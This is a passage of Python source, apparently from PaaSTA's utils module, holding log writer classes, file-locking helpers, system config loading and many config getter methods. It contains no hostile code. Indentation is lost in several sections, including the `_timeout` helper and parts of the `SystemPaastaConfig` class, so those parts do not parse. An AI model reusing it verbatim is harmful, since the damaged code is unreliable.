            cluster: str = ANY_CLUSTER,
            instance: str = ANY_INSTANCE,
        ) -> None:
            """This expects someone (currently the paasta cli main()) to have already
            configured the log object. We'll just write things to it.
            """
            # Echo to the console as well: "event" goes to stdout, "debug"
            # to stderr; any other level is rejected outright.
            if level == "event":
                print(f"[service {service}] {line}", file=sys.stdout)
            elif level == "debug":
                print(f"[service {service}] {line}", file=sys.stderr)
            else:
                raise NoSuchLogLevel
            log_name = get_log_name_for_service(service)
            formatted_line = format_log_line(
                level, cluster, service, instance, component, line
            )
            clog.log_line(log_name, formatted_line)

        def log_audit(
            self,
            user: str,
            host: str,
            action: str,
            action_details: dict = None,
            service: str = None,
            cluster: str = ANY_CLUSTER,
            instance: str = ANY_INSTANCE,
        ) -> None:
            """Ship an audit entry to the shared audit log stream."""
            log_name = AUDIT_LOG_STREAM
            formatted_line = format_audit_log_line(
                user=user,
                host=host,
                action=action,
                action_details=action_details,
                service=service,
                cluster=cluster,
                instance=instance,
            )
            clog.log_line(log_name, formatted_line)

    @register_log_writer("monk")
    class MonkLogWriter(CLogWriter):
        """CLogWriter configured to talk to a local monk daemon."""

        def __init__(
            self,
            monk_host: str = "169.254.255.254",
            monk_port: int = 1473,
            monk_disable: bool = False,
            **kwargs: Any,
        ) -> None:
            super().__init__(
                monk_host=monk_host, monk_port=monk_port, monk_disable=monk_disable,
            )

    @register_log_writer("scribe")
    class ScribeLogWriter(CLogWriter):
        """CLogWriter configured to talk to a local scribe daemon."""

        def __init__(
            self,
            scribe_host: str = "169.254.255.254",
            scribe_port: int = 1463,
            scribe_disable: bool = False,
            **kwargs: Any,
        ) -> None:
            super().__init__(
                scribe_host=scribe_host,
                scribe_port=scribe_port,
                scribe_disable=scribe_disable,
            )

except ImportError:
    # clog is a Yelp-internal package; without it the "monk"/"scribe"
    # drivers are simply not registered.
    warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
    """A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
    logs."""

    def __init__(self, **kwargs: Any) -> None:
        pass

    def log(
        self,
        service: str,
        line: str,
        component: str,
        level: str = DEFAULT_LOGLEVEL,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Discard the log line."""
        pass

    def log_audit(
        self,
        user: str,
        host: str,
        action: str,
        action_details: dict = None,
        service: str = None,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Discard the audit entry."""
        pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
    # No-op context manager, used when file locking is disabled.
    # (contextlib.nullcontext would be an equivalent stdlib replacement.)
    yield


# Union of raw/buffered IO types accepted by the flock helpers below.
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
    """LogWriter that appends JSON log lines to files on local disk.

    The destination path is computed per log line from ``path_format``,
    which may reference {service}, {component}, {level}, {cluster} and
    {instance}.
    """

    def __init__(
        self,
        path_format: str,
        mode: str = "a+",
        line_delimiter: str = "\n",
        flock: bool = False,
    ) -> None:
        self.path_format = path_format
        self.mode = mode
        self.flock = flock
        self.line_delimiter = line_delimiter

    def maybe_flock(self, fd: _AnyIO) -> ContextManager:
        """Return a flock context for *fd* if locking is enabled, else a no-op."""
        if self.flock:
            # https://github.com/python/typeshed/issues/1548
            return flock(fd)
        else:
            return _empty_context()

    def format_path(
        self, service: str, component: str, level: str, cluster: str, instance: str
    ) -> str:
        """Expand path_format with the given log coordinates."""
        return self.path_format.format(
            service=service,
            component=component,
            level=level,
            cluster=cluster,
            instance=instance,
        )

    def _log_message(self, path: str, message: str) -> None:
        # We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
        # and on Linux, writes to O_APPEND files with a single write syscall are atomic.
        #
        # https://docs.python.org/2/library/io.html#io.FileIO
        # http://article.gmane.org/gmane.linux.kernel/43445
        try:
            with io.FileIO(path, mode=self.mode, closefd=True) as f:
                with self.maybe_flock(f):
                    f.write(message.encode("UTF-8"))
        except IOError as e:
            # Best-effort: report the failure on stderr rather than raising,
            # so logging problems don't take down the caller.
            print(
                "Could not log to {}: {}: {} -- would have logged: {}".format(
                    path, type(e).__name__, str(e), message
                ),
                file=sys.stderr,
            )

    def log(
        self,
        service: str,
        line: str,
        component: str,
        level: str = DEFAULT_LOGLEVEL,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Append one structured log line to the per-coordinate file."""
        path = self.format_path(service, component, level, cluster, instance)
        to_write = "{}{}".format(
            format_log_line(level, cluster, service, instance, component, line),
            self.line_delimiter,
        )
        self._log_message(path, to_write)

    def log_audit(
        self,
        user: str,
        host: str,
        action: str,
        action_details: dict = None,
        service: str = None,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Append one audit entry; the audit stream name stands in for the
        service in the path and component/level are left blank."""
        path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
        formatted_line = format_audit_log_line(
            user=user,
            host=host,
            action=action,
            action_details=action_details,
            service=service,
            cluster=cluster,
            instance=instance,
        )
        to_write = f"{formatted_line}{self.line_delimiter}"
        self._log_message(path, to_write)
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
    """Hold an exclusive (blocking) flock on *fd* for the duration of the block."""
    try:
        fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
        yield
    finally:
        # Always release the lock, even if the body raised.
        fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
    """ Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
    raise a TimeoutError if `seconds` elapses before the flock can be obtained
    """
    # We don't want to wrap the user code in the timeout, just the flock grab
    flock_context = flock(fd)
    with Timeout(seconds=seconds):
        flock_context.__enter__()
    try:
        yield
    finally:
        # We entered the flock context manually above, so we must exit it
        # manually too, forwarding any in-flight exception info.
        flock_context.__exit__(*sys.exc_info())
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError, if we try to terminate a non-existing
process as there can be a very small window between poll() and kill()
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
    """Raised when the system paasta configuration is missing, unreadable,
    or lacks a required key."""

    pass


class NoConfigurationForServiceError(Exception):
    """Raised when no configuration can be found for a service."""

    pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
    """
    Returns a sorted list of files that are readable in an input glob by recursively searching a path

    The glob is matched with fnmatch against each file's full path.
    """
    return sorted(
        full_path
        for root, _dirs, files in os.walk(path)
        for full_path in (os.path.join(root, name) for name in files)
        if os.path.isfile(full_path)
        and os.access(full_path, os.R_OK)
        and fnmatch(full_path, glob)
    )
class ClusterAutoscalingResource(TypedDict):
    """One autoscalable resource (e.g. an instance group) in a cluster."""

    type: str
    id: str
    region: str
    pool: str
    min_capacity: int
    max_capacity: int


# resource id -> its autoscaling definition
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]


class ResourcePoolSettings(TypedDict):
    """Per-pool autoscaling tuning knobs."""

    target_utilization: float
    drain_timeout: int


# pool name -> its settings
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]


class MarathonConfigDict(TypedDict, total=False):
    """Connection info for one Marathon server group."""

    user: str
    password: str
    url: List[str]


class LocalRunConfig(TypedDict, total=False):
    """Defaults for `paasta local-run`."""

    default_cluster: str


class RemoteRunConfig(TypedDict, total=False):
    """Defaults for `paasta remote-run`."""

    default_role: str


class SparkRunConfig(TypedDict, total=False):
    """Defaults for `paasta spark-run`."""

    default_cluster: str
    default_pool: str


class PaastaNativeConfig(TypedDict, total=False):
    """Credentials for the paasta-native scheduler."""

    principal: str
    secret: str


ExpectedSlaveAttributes = List[Dict[str, Any]]


class KubeKindDict(TypedDict, total=False):
    """Singular/plural names of a Kubernetes kind."""

    singular: str
    plural: str


class KubeCustomResourceDict(TypedDict, total=False):
    """Definition of a Kubernetes custom resource managed by paasta."""

    version: str
    file_prefix: str
    kube_kind: KubeKindDict
    group: str


class KubeStateMetricsCollectorConfigDict(TypedDict, total=False):
    """Configuration for the kube-state-metrics collector."""

    unaggregated_metrics: List[str]
    summed_metric_to_group_keys: Dict[str, List[str]]
    label_metric_to_label_key: Dict[str, List[str]]
    label_renames: Dict[str, str]
class SystemPaastaConfigDict(TypedDict, total=False):
    """Schema of the merged system paasta JSON configuration.

    All keys are optional (total=False); accessors on SystemPaastaConfig
    supply defaults or raise PaastaNotConfiguredError.
    """

    api_endpoints: Dict[str, str]
    auth_certificate_ttl: str
    auto_config_instance_types_enabled: Dict[str, bool]
    auto_hostname_unique_size: int
    boost_regions: List[str]
    cluster_autoscaler_max_decrease: float
    cluster_autoscaler_max_increase: float
    cluster_autoscaling_draining_enabled: bool
    cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
    cluster_boost_enabled: bool
    cluster_fqdn_format: str
    clusters: Sequence[str]
    cluster: str
    dashboard_links: Dict[str, Dict[str, str]]
    default_push_groups: List
    default_should_run_uwsgi_exporter_sidecar: bool
    deploy_blacklist: UnsafeDeployBlacklist
    deployd_big_bounce_deadline: float
    deployd_log_level: str
    deployd_maintenance_polling_frequency: int
    deployd_max_service_instance_failures: int
    deployd_metrics_provider: str
    deployd_number_workers: int
    deployd_startup_bounce_deadline: float
    deployd_startup_oracle_enabled: bool
    deployd_use_zk_queue: bool
    deployd_worker_failure_backoff_factor: int
    deploy_whitelist: UnsafeDeployWhitelist
    disabled_watchers: List
    dockercfg_location: str
    docker_registry: str
    enable_client_cert_auth: bool
    enable_nerve_readiness_check: bool
    enable_envoy_readiness_check: bool
    enforce_disk_quota: bool
    envoy_admin_domain_name: str
    envoy_admin_endpoint_format: str
    envoy_nerve_readiness_check_script: List[str]
    envoy_readiness_check_script: List[str]
    expected_slave_attributes: ExpectedSlaveAttributes
    filter_bogus_mesos_cputime_enabled: bool
    fsm_template: str
    git_config: Dict
    hacheck_sidecar_image_url: str
    hacheck_sidecar_volumes: List[DockerVolume]
    kubernetes_add_registration_labels: bool
    kubernetes_custom_resources: List[KubeCustomResourceDict]
    kubernetes_use_hacheck_sidecar: bool
    ldap_host: str
    ldap_reader_password: str
    ldap_reader_username: str
    ldap_search_base: str
    ldap_search_ou: str
    local_run_config: LocalRunConfig
    log_reader: LogReaderConfig
    log_writer: LogWriterConfig
    maintenance_resource_reservation_enabled: bool
    marathon_servers: List[MarathonConfigDict]
    mark_for_deployment_max_polling_threads: int
    mark_for_deployment_default_polling_interval: float
    mark_for_deployment_default_diagnosis_interval: float
    mark_for_deployment_default_default_time_before_first_diagnosis: float
    mark_for_deployment_should_ping_for_unhealthy_pods: bool
    mesos_config: Dict
    metrics_provider: str
    monitoring_config: Dict
    nerve_readiness_check_script: List[str]
    paasta_native: PaastaNativeConfig
    paasta_status_version: str
    pdb_max_unavailable: Union[str, int]
    pki_backend: str
    pod_defaults: Dict[str, Any]
    previous_marathon_servers: List[MarathonConfigDict]
    register_k8s_pods: bool
    register_marathon_services: bool
    register_native_services: bool
    remote_run_config: RemoteRunConfig
    resource_pool_settings: PoolToResourcePoolSettingsDict
    secret_provider: str
    security_check_command: str
    sensu_host: str
    sensu_port: int
    service_discovery_providers: Dict[str, Any]
    slack: Dict[str, str]
    spark_run_config: SparkRunConfig
    supported_storage_classes: Sequence[str]
    synapse_haproxy_url_format: str
    synapse_host: str
    synapse_port: int
    taskproc: Dict
    tron: Dict
    uwsgi_exporter_sidecar_image_url: str
    vault_cluster_map: Dict
    vault_environment: str
    volumes: List[DockerVolume]
    zookeeper: str
def load_system_paasta_config(
    path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
    """
    Reads Paasta configs in specified directory in lexicographical order and deep merges
    the dictionaries (last file wins).

    :raises PaastaNotConfiguredError: if the directory is missing/unreadable
        or a config file cannot be read.
    """
    if not os.path.isdir(path):
        raise PaastaNotConfiguredError(
            "Could not find system paasta configuration directory: %s" % path
        )
    if not os.access(path, os.R_OK):
        raise PaastaNotConfiguredError(
            "Could not read from system paasta configuration directory: %s" % path
        )
    try:
        # Freeze (filename, stat) pairs so the argument is hashable and the
        # lru_cache on parse_system_paasta_config invalidates when any config
        # file changes on disk.
        readable = get_readable_files_in_glob(glob="*.json", path=path)
        file_stats = frozenset((fn, os.stat(fn)) for fn in readable)
        return parse_system_paasta_config(file_stats, path)
    except IOError as e:
        raise PaastaNotConfiguredError(
            f"Could not load system paasta config file {e.filename}: {e.strerror}"
        )
def optionally_load_system_paasta_config(
    path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
    """
    Tries to load the system paasta config, but will return an empty configuration if not available,
    without raising.
    """
    try:
        return load_system_paasta_config(path=path)
    except PaastaNotConfiguredError:
        # Empty config with an empty directory marker.
        return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
    file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
    """Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
    # lru_cache keys on the (filename, stat) frozenset, so the cache is
    # naturally invalidated whenever a config file's mtime/size changes.
    # NOTE(review): iteration order over a frozenset is arbitrary; the merge
    # presumably relies on allow_duplicate_keys=False to reject conflicting
    # keys -- confirm that deep_merge_dictionaries raises on duplicates.
    config: SystemPaastaConfigDict = {}
    for filename, _ in file_stats:
        with open(filename) as f:
            config = deep_merge_dictionaries(
                json.load(f), config, allow_duplicate_keys=False
            )
    return SystemPaastaConfig(config, path)
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
    def get_system_docker_registry(self) -> str:
        """Get the docker_registry defined in this host's cluster config file.

        :returns: The docker_registry specified in the paasta configuration
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            return self.config_dict["docker_registry"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find docker registry in configuration directory: %s"
                % self.directory
            )

    def get_hacheck_sidecar_volumes(self) -> List[DockerVolume]:
        """Get the hacheck sidecar volumes defined in this host's hacheck_sidecar_volumes config file.

        :returns: The list of volumes specified in the paasta configuration
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            volumes = self.config_dict["hacheck_sidecar_volumes"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find hacheck_sidecar_volumes in configuration directory: %s"
                % self.directory
            )
        # Normalize ordering/duplicates via the shared volume helper.
        return _reorder_docker_volumes(list(volumes))

    def get_volumes(self) -> Sequence[DockerVolume]:
        """Get the volumes defined in this host's volumes config file.

        :returns: The list of volumes specified in the paasta configuration
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            return self.config_dict["volumes"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find volumes in configuration directory: %s" % self.directory
            )
    def get_cluster(self) -> str:
        """Get the cluster defined in this host's cluster config file.

        :returns: The name of the cluster defined in the paasta configuration
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            return self.config_dict["cluster"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find cluster in configuration directory: %s" % self.directory
            )

    def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
        # Raises KeyError if dashboard_links is not configured.
        return self.config_dict["dashboard_links"]

    def get_auto_hostname_unique_size(self) -> int:
        """
        We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
        If there are less than or equal to this number of instances, we consider it small.
        We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined

        :returns: The integer size of a small service
        """
        return self.config_dict.get("auto_hostname_unique_size", -1)

    def get_auto_config_instance_types_enabled(self) -> Dict[str, bool]:
        # instance type -> whether auto-config is enabled; defaults to {}.
        return self.config_dict.get("auto_config_instance_types_enabled", {})

    def get_api_endpoints(self) -> Mapping[str, str]:
        # cluster name -> paasta API URL; raises KeyError if not configured.
        return self.config_dict["api_endpoints"]
    def get_enable_client_cert_auth(self) -> bool:
        """
        If enabled present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key

        Defaults to True.
        """
        return self.config_dict.get("enable_client_cert_auth", True)

    def get_enable_nerve_readiness_check(self) -> bool:
        """
        If enabled perform readiness checks on nerve (default True)
        """
        return self.config_dict.get("enable_nerve_readiness_check", True)

    def get_enable_envoy_readiness_check(self) -> bool:
        """
        If enabled perform readiness checks on envoy (default False)
        """
        return self.config_dict.get("enable_envoy_readiness_check", False)

    def get_nerve_readiness_check_script(self) -> List[str]:
        # Command (argv list) used for the nerve readiness check.
        return self.config_dict.get(
            "nerve_readiness_check_script", ["/check_smartstack_up.sh"]
        )

    def get_envoy_readiness_check_script(self) -> List[str]:
        # Command (argv list) used for the envoy-only readiness check.
        return self.config_dict.get(
            "envoy_readiness_check_script",
            ["/check_proxy_up.sh", "--enable-envoy", "--envoy-check-mode", "eds-dir"],
        )

    def get_envoy_nerve_readiness_check_script(self) -> List[str]:
        # Command (argv list) used when both smartstack and envoy are checked.
        return self.config_dict.get(
            "envoy_nerve_readiness_check_script",
            ["/check_proxy_up.sh", "--enable-smartstack", "--enable-envoy"],
        )

    def get_enforce_disk_quota(self) -> bool:
        """
        If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
        enforcing the disk quota as a result.

        Please note that this should be enabled only for a suported environment
        (which at the moment is only `overlay2` driver backed by `XFS`
        filesystem mounted with `prjquota` option) otherwise Docker will fail
        to start.
        """
        return self.config_dict.get("enforce_disk_quota", False)

    def get_auth_certificate_ttl(self) -> str:
        """
        How long to request for ttl on auth certificates. Note that this maybe limited
        by policy in Vault
        """
        return self.config_dict.get("auth_certificate_ttl", "11h")

    def get_pki_backend(self) -> str:
        """
        The Vault pki backend to use for issueing certificates
        """
        return self.config_dict.get("pki_backend", "paastaca")

    def get_fsm_template(self) -> str:
        # Defaults to the `template` directory shipped with paasta's fsm CLI.
        fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
        template_path = os.path.join(fsm_path, "template")
        return self.config_dict.get("fsm_template", template_path)
    def get_log_writer(self) -> LogWriterConfig:
        """Get the log_writer configuration out of global paasta config

        :returns: The log_writer dictionary.
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            return self.config_dict["log_writer"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find log_writer in configuration directory: %s"
                % self.directory
            )

    def get_log_reader(self) -> LogReaderConfig:
        """Get the log_reader configuration out of global paasta config

        :returns: the log_reader dictionary.
        :raises PaastaNotConfiguredError: if the key is absent
        """
        try:
            return self.config_dict["log_reader"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find log_reader in configuration directory: %s"
                % self.directory
            )
    def get_metrics_provider(self) -> Optional[str]:
        """Get the metrics_provider configuration out of global paasta config

        The deployd-specific `deployd_metrics_provider` key takes precedence
        over the generic `metrics_provider` key.

        :returns: A string identifying the metrics_provider
        """
        deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
        if deployd_metrics_provider is not None:
            return deployd_metrics_provider
        return self.config_dict.get("metrics_provider")

    def get_deployd_worker_failure_backoff_factor(self) -> int:
        """Get the factor for calculating exponential backoff when a deployd worker
        fails to bounce a service

        :returns: An integer (default 30)
        """
        return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)

    def get_deployd_maintenance_polling_frequency(self) -> int:
        """Get the frequency in seconds that the deployd maintenance watcher should
        poll mesos's api for new draining hosts

        :returns: An integer (default 30)
        """
        return self.config_dict.get("deployd_maintenance_polling_frequency", 30)

    def get_deployd_startup_oracle_enabled(self) -> bool:
        """This controls whether deployd will add all services that need a bounce on
        startup. Generally this is desirable behavior. If you are performing a bounce
        of *all* services you will want to disable this.

        :returns: A boolean (default True)
        """
        return self.config_dict.get("deployd_startup_oracle_enabled", True)

    def get_deployd_max_service_instance_failures(self) -> int:
        """Determines how many times a service instance entry in deployd's queue
        can fail before it will be removed from the queue.

        :returns: An integer (default 20)
        """
        return self.config_dict.get("deployd_max_service_instance_failures", 20)
    def get_sensu_host(self) -> str:
        """Get the host that we should send sensu events to.

        :returns: the sensu_host string, or localhost if not specified.
        """
        return self.config_dict.get("sensu_host", "localhost")

    def get_sensu_port(self) -> int:
        """Get the port that we should send sensu events to.

        :returns: the sensu_port value as an integer, or 3030 if not specified.
        """
        return int(self.config_dict.get("sensu_port", 3030))

    def get_dockercfg_location(self) -> str:
        """Get the location of the dockerfile, as a URI.

        :returns: the URI specified, or file:///root/.dockercfg if not specified.
        """
        return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)

    def get_synapse_port(self) -> int:
        """Get the port that haproxy-synapse exposes its status on. Defaults to 3212.

        :returns: the haproxy-synapse status port.
        """
        return int(self.config_dict.get("synapse_port", 3212))

    def get_default_synapse_host(self) -> str:
        """Get the default host we should interrogate for haproxy-synapse state.

        :returns: A hostname that is running haproxy-synapse.
        """
        return self.config_dict.get("synapse_host", "localhost")

    def get_synapse_haproxy_url_format(self) -> str:
        """Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
        arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".

        :returns: A format string for constructing the URL of haproxy-synapse's status page.
        """
        return self.config_dict.get(
            "synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
        )

    def get_service_discovery_providers(self) -> Dict[str, Any]:
        # provider name -> provider-specific options; defaults to {}.
        return self.config_dict.get("service_discovery_providers", {})
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
:returns A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
    """Configured marathon servers (empty list when unset)."""
    servers = self.config_dict.get("marathon_servers", [])
    return servers
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
    """Marathon servers from before the most recent config change (empty list when unset)."""
    servers = self.config_dict.get("previous_marathon_servers", [])
    return servers
def get_paasta_status_version(self) -> str:
    """Desired 'paasta status' implementation, "new" or "old" (default "old")."""
    return self.config_dict.get("paasta_status_version", "old")
def get_local_run_config(self) -> LocalRunConfig:
    """The local-run job config dictionary (empty mapping when unset)."""
    local_run = self.config_dict.get("local_run_config", {})
    return local_run
def get_remote_run_config(self) -> RemoteRunConfig:
    """The remote-run section of system paasta config (empty mapping when unset)."""
    remote_run = self.config_dict.get("remote_run_config", {})
    return remote_run
def get_spark_run_config(self) -> SparkRunConfig:
    """The spark-run section of system paasta config (empty mapping when unset)."""
    spark_run = self.config_dict.get("spark_run_config", {})
    return spark_run
def get_paasta_native_config(self) -> PaastaNativeConfig:
    """The paasta_native section of system paasta config (empty mapping when unset)."""
    native = self.config_dict.get("paasta_native", {})
    return native
def get_mesos_cli_config(self) -> Dict:
    """Configuration for mesos-cli (the "mesos_config" key; empty mapping when unset)."""
    return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
    """The monitoring config dictionary (empty mapping when unset)."""
    return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
    """Cluster-wide deploy blacklist applied to every service in the cluster."""
    raw_blacklist = self.config_dict.get("deploy_blacklist", [])
    return safe_deploy_blacklist(raw_blacklist)
def get_deploy_whitelist(self) -> DeployWhitelist:
    """Cluster-wide deploy whitelist applied to every service in the cluster."""
    raw_whitelist = self.config_dict.get("deploy_whitelist")
    return safe_deploy_whitelist(raw_whitelist)
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
    """List of dicts describing the attribute combinations expected in this
    cluster; used to compute default routing constraints. May be None."""
    return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
    """Script executed during the security-check build step, or None when unset."""
    return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
    """Number of deployd workers consuming the deployment queue (default 4)."""
    return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
    """Seconds in the future to set the deadline when enqueuing instances for
    SystemPaastaConfig changes. Defaults to one week."""
    one_week_s = 7 * 24 * 60 * 60
    deadline = self.config_dict.get("deployd_big_bounce_deadline", one_week_s)
    return float(deadline)
def get_deployd_startup_bounce_deadline(self) -> float:
    """Seconds in the future to set the deadline when enqueuing instances on
    deployd startup. Defaults to one week."""
    one_week_s = 7 * 24 * 60 * 60
    deadline = self.config_dict.get("deployd_startup_bounce_deadline", one_week_s)
    return float(deadline)
def get_deployd_log_level(self) -> str:
    """Python logging level name for paasta-deployd, e.g. INFO or DEBUG (default INFO)."""
    return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
    """Whether deployd uses the ZooKeeper-backed queue (default True)."""
    use_zk = self.config_dict.get("deployd_use_zk_queue", True)
    return use_zk
def get_hacheck_sidecar_image_url(self) -> str:
    """Docker image URL for the hacheck sidecar container (None when unconfigured)."""
    return self.config_dict.get("hacheck_sidecar_image_url")
def get_register_k8s_pods(self) -> bool:
    """Whether k8s services are registered in nerve (default False)."""
    return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_add_registration_labels(self) -> bool:
    """Whether registration labels are added to kubernetes objects (default False)."""
    add_labels = self.config_dict.get("kubernetes_add_registration_labels", False)
    return add_labels
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
    """Custom resources that setup_kubernetes_cr should sync (empty when unset)."""
    custom_resources = self.config_dict.get("kubernetes_custom_resources", [])
    return custom_resources
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
    """Whether kubernetes pods get the hacheck sidecar (default True)."""
    use_sidecar = self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
    return use_sidecar
def get_register_marathon_services(self) -> bool:
    """Whether marathon services are registered in nerve (default True)."""
    return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
    """Whether native paasta services are registered in nerve (default False)."""
    return self.config_dict.get("register_native_services", False)
def get_taskproc(self) -> Dict:
    """The taskproc section of system paasta config (empty mapping when unset)."""
    taskproc = self.config_dict.get("taskproc", {})
    return taskproc
def get_disabled_watchers(self) -> List:
    """Names of deployd watchers to disable (empty list when unset)."""
    disabled = self.config_dict.get("disabled_watchers", [])
    return disabled
def get_vault_environment(self) -> Optional[str]:
    """Environment name of the vault cluster; must match the environment keys
    in the secret json files used by every service in this cluster."""
    return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
    """Mapping of paasta_cluster to vault ecosystem; needed because not every
    ecosystem runs its own vault cluster. Empty mapping when unset."""
    cluster_map = self.config_dict.get("vault_cluster_map", {})
    return cluster_map
def get_secret_provider_name(self) -> str:
    """Name of the configured secret_provider module used to decrypt secrets
    (defaults to "paasta_tools.secret_providers")."""
    return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
    """Slack token for notifications, or None when none is configured."""
    slack_section = self.config_dict.get("slack", {})
    return slack_section.get("token", None)
def get_tron_config(self) -> dict:
    """The tron section of system paasta config (empty mapping when unset)."""
    tron = self.config_dict.get("tron", {})
    return tron
def get_clusters(self) -> Sequence[str]:
    """All cluster names known to this system config (empty when unset)."""
    clusters = self.config_dict.get("clusters", [])
    return clusters
def get_supported_storage_classes(self) -> Sequence[str]:
    """Storage classes supported in this cluster (empty when unset)."""
